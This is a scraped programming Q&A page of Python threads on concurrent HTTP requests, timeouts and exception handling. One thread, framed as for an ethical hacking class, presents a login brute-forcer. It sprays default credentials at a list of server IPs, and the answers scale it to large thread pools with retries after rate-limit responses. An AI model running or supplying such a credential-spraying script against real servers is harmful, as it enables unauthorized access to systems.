python threading, confirming responses before moving to next line - python

Recently I have been working to integrate google directory, calendar and classroom to work seamlessly with the existing services that we have.
I need to loop through 1500 objects and make requests in google to check something. Responses from google does take awhile hence I want to wait on that request to complete but at the same time run other checks.
def __get_students_of_course(self, course_id, index_in_course_list, page=None):
print("getting students from gclass ", course_id, "page ", page)
# self.__check_request_count(10)
try:
response = self.class_service.courses().students().list(courseId=course_id,
pageToken=page).execute()
# the response must come back before proceeding to the next checks
course_to_add_to = self.course_list_gsuite[index_in_course_list]
current_students = course_to_add_to["students"]
for student in response["students"]:
current_students.append(student["profile"]["emailAddress"])
self.course_list_gsuite[index_in_course_list] = course_to_add_to
try:
if "nextPageToken" in response:
self.__get_students_of_course(
course_id, index_in_course_list, page=response["nextPageToken"])
else:
return
except Exception as e:
print(e)
return
except Exception as e:
print((e))
And I run that function from another function
def __check_course_state(self, course):
course_to_create = {...}
try:
g_course = next(
(g_course for g_course in self.course_list_gsuite if g_course["name"] == course_to_create["name"]), None)
if g_course != None:
index_2 = None
for index_1, class_name in enumerate(self.course_list_gsuite):
if class_name["name"] == course_to_create["name"]:
index_2 = index_1
self.__get_students_of_course(
g_course["id"], index_2) # need to wait here
students_enrolled_in_g_class = self.course_list_gsuite[index_2]["students"]
request = requests.post() # need to wait here
students_in_iras = request.json()
students_to_add_in_g_class = []
for student in students["data"]:
try:
pass
except Exception as e:
print(e)
students_to_add_in_g_class.append(
student["studentId"])
if len(students_to_add_in_g_class) != 0:
pass
else:
pass
else:
pass
except Exception as e:
print(e)
I need to these tasks for 1500 objects.
Although they are not related to each other. I want to move to the next object in the loop while it waits for the other results to come back and finish.
Here is how I tried this with threads:
def create_courses(self):
# pool = []
counter = 0
with concurrent.futures.ThreadPoolExecutor() as excecutor:
results = excecutor.map(
self.__check_course_state, self.courses[0:5])
The problem is when I run it like this I get multiple SSL errors and other errors and as far as I understand, as the threads themselves are running, the requests never wait to finish and move to the next line hence I have nothing in the request object so it throws me errors?
Any Ideas on how to approach this?

The ssl error occurs her because i was reusing the http instance from google api lib. self.class_service is being used to send a request while waiting on another request. The best way to handle this is to create instances of the service on every request.

Related

Stop multiprocessing from going through entire list for function for bruteforcer

I am trying to make a brute forcer for my ethical hacking class using multiprocessing, I want it to iterate through the list of server IP's and try one login for each of them, but it is printing every single IP before trying to make connections, and then once all the IP's have been printed, it will start trying to make connections then print a couple IP's, then try to make another connection, and so on.
I just want it to iterate through the list of IP's and try to connect to each one, one process for each connection and try about 20 processes at a time
import threading, requests, time, os, multiprocessing
global count2
login_list=[{"username":"admin","password":"Password1"}]
with open('Servers.txt') as f:
lines = [line.rstrip() for line in f]
count=[]
for number in range(len(lines)):
count.append(number)
count2 = count
def login(n):
try:
url = 'http://'+lines[n]+'/api/auth'
print(url)
if '/#!/init/admin' in url:
print('[~] Admin panel detected, saving url and moving to next...')
x = requests.post(url, json = login_list)
if x.status_code == 422:
print('[-] Failed to connect, trying again...')
print(n)
if x.status_code == 403:
print('[!] 403 Forbidden, "Access denied to resource", Possibly to many tries. Trying again in 20 seconds')
time.sleep(20)
print(n)
if x.status_code == 200:
print('\n[~] Connection successful! Login to '+url+' saved.\n')
print(n)
except:
print('[#] No more logins to try for '+url+' moving to next server...')
print('--------------')
if __name__ == "__main__":
# creating a pool object
p = multiprocessing.Pool()
# map list to target function
result = p.map(login, count2)
An example of the Server.txt file:
83.88.223.86:9000
75.37.144.153:9000
138.244.6.184:9000
34.228.116.82:9000
125.209.107.178:9000
33.9.12.53:9000
Those are not real IP adresses
I think you're confused about how the subprocess map function passes values to the relevant process. Perhaps this will make matters clearer:
from multiprocessing import Pool
import requests
import sys
from requests.exceptions import HTTPError, ConnectionError
IPLIST = ['83.88.223.86:9000',
'75.37.144.153:9000',
'138.244.6.184:9000',
'34.228.116.82:9000',
'125.209.107.178:9000',
'33.9.12.53:9000',
'www.google.com']
PARAMS = {'username': 'admin', 'password': 'passw0rd'}
def err(msg):
print(msg, file=sys.stderr)
def process(ip):
with requests.Session() as session:
url = f'http://{ip}/api/auth'
try:
(r := session.post(url, json=PARAMS, timeout=1)).raise_for_status()
except ConnectionError:
err(f'Unable to connect to {url}')
except HTTPError:
err(f'HTTP {r.status_code} for {url}')
except Exception as e:
err(f'Unexpected exception {e}')
def main():
with Pool() as pool:
pool.map(process, IPLIST)
if __name__ == '__main__':
main()
Additional notes: You probably want to specify a timeout otherwise unreachable addresses will take a long time to process due to default retries. Review the exception handling.
The first thing I would mention is that this is a job best suited for multithreading since login is mostly waiting for network requests to complete and it is far more efficient to create threads than to create processes. In fact you should create a thread pool whose size is equal to the number of URLs you will be posting to up to a maximum of say a 1000 (and you would not want to create a multiprocessing pool of that size).
Second, when you are doing multiprocessing or multithreading your worker function, login in this case, is processing a single element of the iterable that is being passed to the map function. I think you get that. But instead of passing to map the list of servers you are passing a list of numbers (which are indices) and then login is using that index to get the information from the lines list. That is rather indirect. Also, the way you build the list of indices could have been simplified with one line: count2 = list(range(len(lines))) or really just count2 = range(len(lines)) (you don't need a list).
Third, in your code you say that you are retrying certain errors but there is actually no logic to do so.
import requests
from multiprocessing.pool import ThreadPool
from functools import partial
import time
# This must be a dict not a list:
login_params = {"username": "admin", "password": "Password1"}
with open('Servers.txt') as f:
servers = [line.rstrip() for line in f]
def login(session, server):
url = f'http://{server}/api/auth'
print(url)
if '/#!/init/admin' in url:
print(f'[~] Admin panel detected, saving {url} and moving to next...')
# To move on the next, you simply return
# because you are through with this URL:
return
try:
for retry_count in range(1, 4): # will retry up to 3 times certain errors:
r = session.post(url, json=login_params)
if retry_count == 3:
# This was the last try:
break
if r.status_code == 422:
print(f'[-] Failed to connect to {url}, trying again...')
elif r.status_code == 403:
print(f'[!] 403 Forbidden, "Access denied to resource", Possibly to many tries. Trying {url} again in 20 seconds')
time.sleep(20)
else:
break # not something we retry
r.raise_for_status() # test status code
except Exception as e:
print('Got exception: ', e)
else:
print(f'\n[~] Connection successful! Login to {url} saved.\n')
if __name__ == "__main__":
# creating a pool object
with ThreadPool(min(len(servers), 1000)) as pool, \
requests.Session() as session:
# map will return list of None since `login` returns None implicitly:
pool.map(partial(login, session), servers)

Python Pool Multiprocessing Requests Hanging

The code in my program essentially conducts 10 python requests simultaneously and processes their output also simultaneously, it was working for a while but I changed something and can't work out what broke it.
The following code is the code that calls, the code appears to freeze between lines 3 and 4, so in the process of doing the multithreaded requests.
The line 'print("failed to close") does not print, appearing to indicate that the program does not reach the pool.close() instruction.
listoftensites = listoftensites
pool = Pool(processes=10) # Initalize a pool of 10 processes
listoftextis, listofonline = zip(*pool.map(onionrequestthreaded, listoftensites)) # Use the pool to run the function on the items in the iterable
print("failed to close ")
pool.close()
# this means that no more tasks will be added to the pool
pool.join()
The function which is called at which it hangs, is immediately after the line 'print("failed in return")', this would appear to indicate that the requests do not terminate properly and return the expected values.
def onionrequestthreaded(onionurl):
session = requests.session()
session.proxies = {}
session.proxies['http'] = 'socks5h://localhost:9050'
session.proxies['https'] = 'socks5h://localhost:9050'
onionurlforrequest = "http://" + onionurl
#print(onionurlforrequest)
print("failed with proxy session")
try:
print("failed in request")
r = session.get(onionurlforrequest, timeout=15, allow_redirects=True)
online = 2
print("failed in text extraction")
textis = r.text
except:
print("failed in except")
#print("failed")
online = 1
textis = ""
print("failed in return")
return textis, online
Very confusing but i'm probably doing something simple. Please let me know if there's a solution to this as i'm pulling my hair out.

Handling exception in calling a external api

I'm calling Udemy external api to build a simple REST service for experimental purpose.
https://www.udemy.com/developers/affiliate/
Here is my get_all() courses method.
class Courses(object):
"""
Handles all requests related to courses.
ie; gets the courses-list, courses-detail, coursesreviews-list
"""
def __init__(self, api):
self.api = api
logger.debug("courses initialized")
def get_all(self):
page = 1
per_page = 20
while True:
res = self._get_courses(page, per_page)
if not res['results']:
break
try:
for one in res['results']:
yield one
except Exception as e: -->>>handling exception
print(e)
break
page += 1
def _get_courses_detail(self, page, per_page):
resource = "courses"
params = {'page': page, 'per_page': per_page,
# 'fields[course]': '#all'
}
res = self.api.get(resource, params)
return res
Now, is it reasonable to handle a exception(in get_all() method) assuming that there could some error in the returning data of the api?
Or handling the exception(in get_all) is not needed here and it should be handled by the calling function?
Most of the open source projects that I see don't handle this exception.
I'm sharing the opinion in this answer. So catch the exception as soon as possible and rethrow it if needed to the next layer.
With practice and experience with your code base it becomes quite easy to judge when to add additional context to errors, and where it's most sensible to actually, finally handle the errors.
Catch → Rethrow
Do this where you can usefully add more information that would save a developer having to work through all the layers to understand the problem.
Catch → Handle
Do this where you can make final decisions on what is an appropriate, but different execution flow through the software.
Catch → Error Return

urllib request fails when page takes too long to respond

I have a simple function (in python 3) to take a url and attempt to resolve it: printing an error code if there is one (e.g. 404) or resolve one of the shortened urls to its full url. My urls are in one column of a csv files and the output is saved in the next column. The problem arises where the program encounters a url where the server takes too long to respond- the program just crashes. Is there a simple way to force urllib to print an error code if the server is taking too long. I looked into Timeout on a function call but that looks a little too complicated as i am just starting out. Any suggestions?
i.e. (COL A) shorturl (COL B) http://deals.ebay.com/500276625
def urlparse(urlColumnElem):
try:
conn = urllib.request.urlopen(urlColumnElem)
except urllib.error.HTTPError as e:
return (e.code)
except urllib.error.URLError as e:
return ('URL_Error')
else:
redirect=conn.geturl()
#check redirect
if(redirect == urlColumnElem):
#print ("same: ")
#print(redirect)
return (redirect)
else:
#print("Not the same url ")
return(redirect)
EDIT: if anyone gets the http.client.disconnected error (like me), see this question/answer http.client.RemoteDisconnected error while reading/parsing a list of URL's
Have a look at the docs:
urllib.request.urlopen(url, data=None[, timeout])
The optional timeout parameter specifies a timeout in seconds for blocking operations like the connection attempt (if not specified, the global default timeout setting will be used).
You can set a realistic timeout (in seconds) for your process:
conn = urllib.request.urlopen(urlColumnElem, timeout=realistic_timeout_in_seconds)
and in order for your code to stop crushing, move everything inside the try except block:
import socket
def urlparse(urlColumnElem):
try:
conn = urllib.request.urlopen(
urlColumnElem,
timeout=realistic_timeout_in_seconds
)
redirect=conn.geturl()
#check redirect
if(redirect == urlColumnElem):
#print ("same: ")
#print(redirect)
return (redirect)
else:
#print("Not the same url ")
return(redirect)
except urllib.error.HTTPError as e:
return (e.code)
except urllib.error.URLError as e:
return ('URL_Error')
except socket.timeout as e:
return ('Connection timeout')
Now if a timeout occurs, you will catch the exception and the program will not crush.
Good luck :)
First, there is a timeout parameter than can be used to control the time allowed for urlopen. Next an timeout in urlopen should just throw an exception, more precisely a socket.timeout. If you do not want it to abort the program, you just have to catch it:
def urlparse(urlColumnElem, timeout=5): # allow 5 seconds by default
try:
conn = urllib.request.urlopen(urlColumnElem, timeout = timeout)
except urllib.error.HTTPError as e:
return (e.code)
except urllib.error.URLError as e:
return ('URL_Error')
except socket.timeout:
return ('Timeout')
else:
...

Multiple simultaneous HTTP requests

I'm trying to take a list of items and check for their status change based on certain processing by the API. The list will be manually populated and can vary in number to several thousand.
I'm trying to write a script that makes multiple simultaneous connections to the API to keep checking for the status change. For each item, once the status changes, the attempts to check must stop. Based on reading other posts on Stackoverflow (Specifically, What is the fastest way to send 100,000 HTTP requests in Python? ), I've come up with the following code. But the script always stops after processing the list once. What am I doing wrong?
One additional issue that I'm facing is that the keyboard interrup method never fires (I'm trying with Ctrl+C but it does not kill the script.
from urlparse import urlparse
from threading import Thread
import httplib, sys
from Queue import Queue
requestURLBase = "https://example.com/api"
apiKey = "123456"
concurrent = 200
keepTrying = 1
def doWork():
while keepTrying == 1:
url = q.get()
status, body, url = checkStatus(url)
checkResult(status, body, url)
q.task_done()
def checkStatus(ourl):
try:
url = urlparse(ourl)
conn = httplib.HTTPConnection(requestURLBase)
conn.request("GET", url.path)
res = conn.getresponse()
respBody = res.read()
conn.close()
return res.status, respBody, ourl #Status can be 210 for error or 300 for successful API response
except:
print "ErrorBlock"
print res.read()
conn.close()
return "error", "error", ourl
def checkResult(status, body, url):
if "unavailable" not in body:
print status, body, url
keepTrying = 1
else:
keepTrying = 0
q = Queue(concurrent * 2)
for i in range(concurrent):
t = Thread(target=doWork)
t.daemon = True
t.start()
try:
for value in open('valuelist.txt'):
fullUrl = requestURLBase + "?key=" + apiKey + "&value=" + value.strip() + "&years="
print fullUrl
q.put(fullUrl)
q.join()
except KeyboardInterrupt:
sys.exit(1)
I'm new to Python so there could be syntax errors as well... I'm definitely not familiar with multi-threading so perhaps I'm doing something else wrong as well.
In the code, the list is only read once. Should be something like
try:
while True:
for value in open('valuelist.txt'):
fullUrl = requestURLBase + "?key=" + apiKey + "&value=" + value.strip() + "&years="
print fullUrl
q.put(fullUrl)
q.join()
For the interrupt thing, remove the bare except line in checkStatus or make it except Exception. Bare excepts will catch all exceptions, including SystemExit which is what sys.exit raises and stop the python process from terminating.
If I may make a couple comments in general though.
Threading is not a good implementation for such large concurrencies
Creating a new connection every time is not efficient
What I would suggest is
Use gevent for asynchronous network I/O
Pre-allocate a queue of connections same size as concurrency number and have checkStatus grab a connection object when it needs to make a call. That way the connections stay alive, get reused and there is no overhead in creating and destroying them and the increased memory use that goes with it.

Categories